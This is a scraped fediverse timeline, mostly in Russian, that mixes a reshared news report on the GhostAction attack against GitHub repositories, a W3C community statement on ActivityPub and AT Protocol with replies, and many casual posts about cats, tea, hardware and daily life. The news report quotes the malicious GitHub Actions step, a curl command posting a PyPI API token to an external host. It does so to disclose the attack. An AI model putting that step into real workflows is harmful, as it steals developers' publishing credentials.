Пропустить до основного содержимого

honk - Ссылка на источник

В ходе атаки GhostAction скомпрометировано 817 репозиториев на GitHub
Исследователи из компании GitGuardian выявили массовую атаку на пользователей GitHub, в ходе которой был получен контроль над 327 учётными записями и осуществлена подстановка вредоносного обработчика Github Action в 817 репозиториев. Атака привела к утечке 3325 секретов, используемых в системах непрерывной интеграции и передаваемых через переменные окружения, включая токены доступа к PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам.
GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub. Например, при помощи GitHub Actions можно выполнить определённые проверки и тесты при совершении коммитов или автоматизировать обработку новых Issues. Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющем Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.
- name: Github Actions Security
run: |
curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' bold-dhawan.45-139-104-115.ple…

Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер вредоносные коммиты были отменены примерно в 100 репозиториях. В настоящее время при поиске в GitHub определяется 671 коммит с вредоносным Github Action.

Источник: opennet.ru/opennews/art.shtml?…

⚠️ SECURITY Compromised repository

This repo has been compromised, see this commit 658e210
CharlesB2 (GitHub)

juick - Ссылка на источник
#баян
#баян

поделились этим

lemmy - Ссылка на источник

Statement on discourse about ActivityPub and AT Protocol by W3C SocialCG
Over the past few months in particular, the Social Web Community Group has seen an increase in heated discussions online that have been arguing protocol superiority and creating conflict between ActivityPub and AT Protocol, or trying to promote one over the other. These discussions have generally not been productive, created contention within the community that stands in the way of collaboration, and been a hotbed for conflict, disagreements, and misinformation. There has often been significant biases exhibited within these conversations.

ActivtyPub in its current usage does make different design decisions to AT Protocol, but ActivityPub is not necessarily that different from AT Protocol: both are open social web protocols.

There is an entire section of the ActivityPub specification that isn't as well known or widely adopted but which, at a high level, provides fairly similar ideas to those emphasized within the AT Protocol community for separation between data, identity and applications. Recently, a taskforce within the Social Web Community Group has been established to advance what is now known as the ActivityPub API.

Whilst we may have our differences at present, over time those gaps will narrow, as we share a lot more in common than we have differences.

There does not have to be a “winning” protocol. We do not build a better open social web for everyone by fighting and arguing about protocol superiority. That is not how we achieve a better open social web. Instead, we must work together, cross-pollinate and share ideas, and participate within each other's communities with respect and mutual understanding. Arguing between us only emboldens those that seek to derail and destroy efforts to build an open social web.

The practice of collaboration outside of our own groups has a long history within the standards community, whether that is with competing companies working together on standards or protocols, or collaboration between different standards bodies like the W3C and IETF.

There has already been cross-pollination of ideas between the people working on ActivityPub and AT Protocol. For example, AT Protocol adopted an internet draft that was originally written to support the ActivityPub ecosystem, and projects within ActivityPub have adopted some ideas on content labeling and starter packs from the AT Protocol ecosystem.

Both ActivityPub and AT Protocol can and do co-exist. This co-existence is perhaps best emphasized by the outstanding work of Bridgy Fed project, which connects ActivityPub, AT Protocol, and other protocols together allowing for interoperability and community that crosses between protocols. If you wanted to summarise this letter on a t-shirt, it would be “People > Protocols > Platforms”.

This statement is a call for cooling the temperature of discussions and a reminder to be respectful of each other and the huge amount of work everyone is putting in to build a better open social web. We do not win by tearing each other down, which only emboldens and empowers those who do not want either protocol to succeed.

This statement was written following an initial discussion at this month's Social Web Community Group meeting, and has been reviewed by several members of the CG.


general/statements/2025-09-05-activitypub-and-atproto-discourse.md at master · swicg/general

General issue tracker for the group. Contribute to swicg/general development by creating an account on GitHub.
GitHub
#Fediverse

не нравится это

в ответ на flamingos-cant (hopepunk arc)

Ulrich
lemmy - Ссылка на источник
Ulrich

People are arguing because ATProto is not open. And that couldn't be more clear in the simple fact that BSky hosts tens of millions of users, 99.95% of "the ATmosphere". While AP has <1% of the number of users and yet they're strewn across tens of thousands of servers.

We've already seen the implications of such closure in the silencing of users by foreign govts, silencing of users in an entire state, and enforcement of draconian ID laws on millions of users in the EU. Meanwhile AP is largely unaffected.

And BSky is still taking the Silicon Valley approach of "we'll figure out how to make money later", to which the answers are the same as every other social platform. They're not funded by donations, they're funded by investments from investors who expect to see a profit eventually.

Эта запись была отредактирована (1 неделя назад)
в ответ на Ulrich

Microw
piefed - Ссылка на источник
Microw

ATProto is open. Bluesky is not.

What we currently see is similar to how ActivityPub looked when it was first drawn up as a protocol: when 99% of users were on Mastodon GmbH's server.

The ten thousands of servers came later. And in theory ATProto is defined open enough that it is possible to implement it independently from Bluesky.

Ulrich не нравится это.

в ответ на Microw

Ulrich
lemmy - Ссылка на источник
Ulrich
ATProto is open. Bluesky is not.


Not a distinction worth making when 99+% are all on the same server.

when 99% of users were on Mastodon GmbH's server


99% of the 12 users? Again, BSky is tens of millions of users. Why is it you think they're all on the same server?

And in theory ATProto is defined open enough that it is possible to implement it independently from Bluesky.


Then why is no one doing it?

Эта запись была отредактирована (1 неделя назад)
в ответ на flamingos-cant (hopepunk arc)

General_Effort
lemmy - Ссылка на источник
General_Effort

The statement has been... uh... updated. The URL now reads:

A statement was originally published here, however, we have since received an objections to its publication citing that proper processes were not followed, and therefore it has been taken down and republished on Emelia's website instead, whilst we seek community group consensus. When Emelia merged the pull request, she had been granted permission to do so by the co-chair of the Social Web CG, and given the number of signatories with various significant contributions to ActivityPub and ActivityStreams, Emelia believed that there was enough agreement to publish.

mastodon - Ссылка на источник
Fopses illustrations extracted from Firefox browser :neofox_floof_cute: :ablobfoxbongo:
A collage featuring various illustrations from the Firefox browser, all featuring foxes in different poses. Here are some examples : - a fox using a laptop - a fox running while holding an unicorn - a fox peeking out from the border - a fox sitting in front of a window with a plant - a fox lying on a cloud - a fox using a smartphone etc.

поделились этим

mastodon - Ссылка на источник

— Уйди, двуногое! Это МОЙ дом!

#photo #animals #cats #Caturday
#фото #животные #кошки

@rf

#photo #животные #кошки #фото #cats #caturday #animals @Rоссийская🐻Fедерация

поделились этим

mastodon - Ссылка на источник
Зноўку цёпленька

mastodon - Ссылка на источник

Бегу сегодня забег на 10к.
Небольшая дистанция, но хочется пробежать пошустрее обычного.

Из минусов
- оч плохо спал последние 2 дня и это ощущается
- перекрыли часть города из-за прайда и до старта придется идти пешком

Но в целом, надежды пробежать приемлимо есть.

Эта запись была отредактирована (1 неделя назад)

di поделился этим.

mastodon - Ссылка на источник

подлючил джойстик от PS4 к андроидному планшету и он вроде работает, но как-то наполовину. левый стик норм, а правый почему-то решил что ему вместо движени надо нажимать кнопки L2 и опшн. вместо X нажимается О и подобная фигня.

может быть кто-то знает как чинить подобные проблемы?

mastodon - Ссылка на источник

sharkey - Ссылка на источник

поделились этим

mastodon - Ссылка на источник

Елец, Липецкая область | Elets, Lipetsk region, 2018.
(c) Sergey Trapezin

#closeuprussia #sergeitrapezin #rf #photography #photo

@rf

#photo #photography #closeuprussia #rf #sergeitrapezin @Rоссийская🐻Fедерация

misskey - Ссылка на источник
Damn, 80% of my Fedi TL is mostly catboys, all thx to me following @yura@udongein.xyz 😁
Not complaining, I liked it. Though I get very flustered whenever I doomscroll my fedi TL, and then sometimes decided to just be like “this is too cute, am just gonna do something else”
@Meko #nowar

mastodon - Ссылка на источник
Необъяснимо...

sharkey - Ссылка на источник
Майор и его страшный тактический К-9 волкодав (нет).
Ещё один лайфхак с сумкой. Закон не нарушаешь, но обе руки свободны.
Эта запись была отредактирована (1 неделя назад)

mastodon - Ссылка на источник

Debugging spi flash on a STM32H750.

I really need to build more low speed high density probing tools this is not great

Four probes poking a SOIC on a small purple PCB hanging off a larger green devkit

sharkey - Ссылка на источник

Sensitive content

в ответ на sad axolotl

Сара Кварц
sharkey - Ссылка на источник
Сара Кварц

Sensitive content

Эта запись была отредактирована (1 неделя назад)

mastodon - Ссылка на источник
Как пройти мимо? Правильно, ни как!!)))
в ответ на di

Alado
friendica (DFRN) - Ссылка на источник
Alado
@di нифига себе! Это довольно дорого.
@di
в ответ на Alado

di
mastodon - Ссылка на источник
di
@alado да, дешёвого вина здесь нет, если только по акциям. зато остальное бухло дешёвое - цены, как правило, почти как в дютике
@Alado
в ответ на di

Alado
friendica (DFRN) - Ссылка на источник
Alado
@di
Не смог найти вот эту марку со второй полки. Смутно помню, что видел ее нас в магазинах. По-моему, какая-то бурда дешманская. А вот Cielo с нижней полки у нас стоит в районе 1000-1100
@di
в ответ на Alado

di
mastodon - Ссылка на источник
di
@alado на 1й и 2й полках (если сверху считать) - это meadow - компания из ЮАР, которая делает всё: вино, чай, печеньки итд итп
а на нижней полутора литровые Cielo и Bayengra
@Alado
в ответ на di

di
mastodon - Ссылка на источник
di
@alado кстати, за 15 баксов, на фотке не видно, это полуторо литровый испанский жбан
@Alado

mastodon - Ссылка на источник

The Engineer is Engi... WHERE?

#brotato

Геймплей Brotato за инженера.
#brotato
в ответ на Digitual

Minni_Dia ★ ★ ★ ★ ★
mastodon - Ссылка на источник
Minni_Dia ★ ★ ★ ★ ★
@Digitual я вылезти из нее не могу, скоро, возможно, придется запрашивать помощь, чтобы меня обратно в гта вернули.
@Digitual

mastodon - Ссылка на источник
Что вам не нравится в текущих Matrix клиентах на Android/PC?

mastodon - Ссылка на источник
have I mentioned that I hate SD cards? because wow do I hate SD cards. awful awful storage format.
в ответ на Graham Sutherland / Polynomial

Graham Sutherland / Polynomial
mastodon - Ссылка на источник
Graham Sutherland / Polynomial
microSD in particular is a product category that I find baffling. it is so physically small that it becomes useless as a portable storage medium because you 100% will lose it, and if you need any appreciable density or performance on the thing it's also very expensive, which makes losing it all the more terrible. so most of the time it's only getting used for expansion storage, which would be far better served by the device just having more native storage using a far better device type.

mastodon - Ссылка на источник

Sensitive content

#photography #blackandwhite #girls #aesthetic

mastodon - Ссылка на источник
Прыгажунчыкі

mastodon - Ссылка на источник

@ivanhead

Вовремя ты побрился xD

calend.ru/holidays/0/0/3570/


Всемирный день бороды

Каждую первую субботу сентября отмечается Всемирный день бороды (англ. World Beard Day). Все представители мужской половины человечества, носящие бороду, могут присоединиться к акциям, посвящённым этому празднику.История ношения бороды или отказа...
Calend.ru
@Мистер Пушистик!

mastodon - Ссылка на источник
Сейчас возле меня произошла довольно смешная ситуация.
Низкий тощий мужик пытался удержать свою огромную овчарку, чтобы она не побежала голубей ловить
(Ну или это был ребёнок с лысиной)

mastodon - Ссылка на источник

Sensitive content

поделились этим

mastodon - Ссылка на источник

Каждую первую субботу сентября отмечается Всемирный день бороды (англ. World Beard Day)!

Ушёл активно праздновать: проблема частного сектора в том, участок сам себя не уберёт. 😀)

#holydays

#holydays
Эта запись была отредактирована (1 неделя назад)

kurator88 поделился этим.

в ответ на RamSDRAdmin (R3DHX)

medvedych
mastodon - Ссылка на источник
medvedych
проблема частного сектора в логистике, а остальное мелочи жизни 😀
@kurator88
@kurator88
в ответ на medvedych

kurator88
mastodon - Ссылка на источник
kurator88
@medvedych просто заранее берешь всего с запасом 😀 мне вот день даже стало на заправку ездить, думаю над еврокубом топлива с доставкой 😀
@medvedych

mastodon - Ссылка на источник

Пуэрное.

#БукаЗаварюка #чай

Мини-чаепитие на чёрной чабани с волнистым узором: крошка-чайничек из исинской глины и прозрачный чахай с узким носиком. На сером чайном полотенце перед ними - прозрачная пиалка с двойными стенками, в ней коричневый чай. На фоне - монитор с туманным хвойным лесом на обоях.
Чахай поближе: он из рельефного стекла, поэтому свет красиво преломляется в стенках и чае, создавая разноцветные блики.
#БукаЗаварюка #чай
Эта запись была отредактирована (1 неделя назад)
в ответ на Бука

Alex Maryson
mastodon - Ссылка на источник
Alex Maryson
Помню, был в Fix Price стеклянный молочник похожий где-то на стакан объёмом, только усечённой пирамидкой, всё хотел его купить, да не знал, зачем. А вот затем бы и пригодился

misskey - Ссылка на источник
春がきたんやで〜

mastodon - Ссылка на источник
#котатэрапія
#caturday
#catsofmastodon
#cats
#cats #caturday #catsofmastodon #котатэрапія

mastodon - Ссылка на источник

Первый урок инглиша в универе

"напишите слова, которые вас описывают, как человека, по одному слову на каждую букву имени и расскажите о том, как оно к вам относится"

Auto upgradable
Reproducible
Text-configurated
Emacs
Mostly working

Я неиронически рассказал всему классу про NixOs вместо себя

Я прям реально сказал I don't usually talk about myself so I'll describe my home computer instead

Мне хотели задать вопросы, но не смогли

Чувствую себя победителем

в ответ на std::living std::fish

std::living std::fish
mastodon - Ссылка на источник
std::living std::fish

Мне запретили разговаривать на тему ПК, используя термины, потому что препод меня не понимает

В целом ожидаемо

Переключаемся на велосипедную тематику.

в ответ на std::living std::fish

E23
mastodon - Ссылка на источник
E23
препод переиграл
Но доблестный воин не сдавался
Эта запись была отредактирована (1 неделя назад)

pleroma - Ссылка на источник
#meme #yaoi #artspam
Two catboys hug. Text: Keep meowing at me and this is how we gonna end
#artspam #meme #yaoi
Эта запись была отредактирована (1 неделя назад)

mastodon - Ссылка на источник
Спасите, кот пытается отжать бутерброд прямо у меня с рук

mastodon - Ссылка на источник

#лытдыбр

злорадствую по поводу жителей сша

#лытдыбр

mastodon - Ссылка на источник

🪟 Мало кто знает, но даже на таком относительно современном компьютере с шильдиком DNS вполне возможно запустить Windows 95.

А смысл, если эту же систему запускали на различных эмуляторах? Взять бы тот же DOSBox, VMware и PCem.

А если на андроиде, то можно попробовать установить систему на Limbo PC, по которому я сильно балдел ещё в 2016 году на своем стареньком планшете от Huawei.

mastodon - Ссылка на источник

Теперь у всех есть отчётливое ощущение скорого наступления чебурнета?
Срочно пилите свои прокси-серверы за пределами этойСтраны.

#proxy #VPN

> Минцифры определило, какие сайты будут работать при отключениях интернета.

Как сообщили источники РБК, туда вошли госсервисы, маркетплейсы, онлайн-карты, банковские сервисы и др. Список планируется расширять.

rbc.ru/technology_and_media/05…


Появился список сайтов, которые будут работать при отключении интернета

Минцифры определило, какие сайты будут работать при отключениях интернета. Как сообщили источники РБК, туда вошли госсервисы, маркетплейсы, онлайн-карты, банковские сервисы и др. Список планируется расширять
РБК
#vpn #proxy
Источник неизвестен

Yastreb
mastodon - Ссылка на источник
Yastreb
@strizhechenko see soon: stegoproxy через proza.ru
@Ambassador Tablicek
Источник неизвестен

Who Let The Dogs Out 🐾
mastodon - Ссылка на источник
Who Let The Dogs Out 🐾
@strizhechenko
Вот это верное направление мысли.
Оставайтесь на месте, за вами уже выехали. 😉
@Ambassador Tablicek

mastodon - Ссылка на источник

di поделился этим.

sharkey - Ссылка на источник

Грохнул все пользовательские сертификаты. Все равно ругается 🫩

Dmitry

2025-09-03 12:45:19

sharkey - Ссылка на источник

Какие интересные предупреждения на galaxy (One Ui 7).

в ответ на Ныш

Dmitry
sharkey - Ссылка на источник
Dmitry
У меня сейчас вообще никаких сертификатов и все равно ругается 😒

gotosocial - Ссылка на источник
Abstieg von der Wasseralm zum Bootsanleger Salet bei strömendem Regen über den Röthsteig. Sehr anstrengend, ich war froh, als wir unten waren. Der Steig ist anspruchsvoll aber auch sehr gut gesichert, macht bei gutem Wetter wahrscheinlich mehr Spaß. #wandern #königssee
der Obersee im Nebel
eine Gruppe von Wanderern beim Abstieg auf einem ausgesetzten Pfad
Bäume im Nebel
Wanderer im Nebel auf einem Pfad im Wald
Wasseralm im Nebel
Wasseralm Hütte im Nebel
#Wandern #königssee

mastodon - Ссылка на источник

Вот субботнее смотрилово для ретроэнтузиастов.

Чувак детально рассказывает и показывает, как он при помощи оптимизированных исходников от оригинальной Super Mario Bros. слепил все 32 уровня в один большой мегауровень.

youtu.be/TovR3tpAQXU

mastodon - Ссылка на источник

Sensitive content

This website uses cookies to recognize revisiting and logged in users. You accept the usage of these cookies by continue browsing this website.